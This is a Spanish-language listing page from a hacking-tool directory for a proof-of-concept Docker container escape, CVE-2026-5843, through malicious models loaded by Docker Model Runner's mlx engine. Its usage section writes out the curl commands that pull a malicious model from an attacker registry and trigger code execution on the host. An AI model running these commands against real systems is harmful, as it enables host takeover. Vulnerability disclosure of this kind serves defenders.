Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/davidrxchester/cve-2026-5843
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónRed TeamingDesarrollo de PayloadsEscape de ContenedoresSeguridad de IA
GitHubdavidrxchester/cve-2026-5843

CVE-2026-5843

POC de escape de contenedores Docker mediante mlx-metal importlib

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-5843 PoC

Registro OCI mínimo que sirve un modelo malicioso para explotar la ruta de ejecución de model_file importlib en mlx-lm. Cuando Docker Model Runner carga el modelo para inferencia, model.py se ejecuta en el host como el usuario conectado.

Requiere: Docker Desktop ≤ 4.70.x (Apple Silicon) con Model Runner habilitado

Uso

root@kitploit:~
# 1. Start the registry on the host
python3 poc_cve_2026_5843.py

# 2. From any container on the Docker network
docker run -it --rm curlimages/curl sh

curl -X POST http://model-runner.docker.internal/api/pull \
  -H 'Content-Type: application/json' \
  -d '{"name":"localhost:5555/evil/model:latest"}'

curl --max-time 120 -X POST http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
  -H 'Content-Type: application/json' \
  -d '{"model":"localhost:5555/evil/model:latest","messages":[{"role":"user","content":"hi"}]}'

La salida se escribe en ~/Desktop/mlx.txt en el host.

Informe completo: https://davidrochester.com/posts/container-escape-via-inference

CVEs relacionados

  • CVE-2026-5817 — vllm-metal trust_remote_code=True, misma superficie de ataque, corregido en Docker Desktop 4.68.0
Descargar herramienta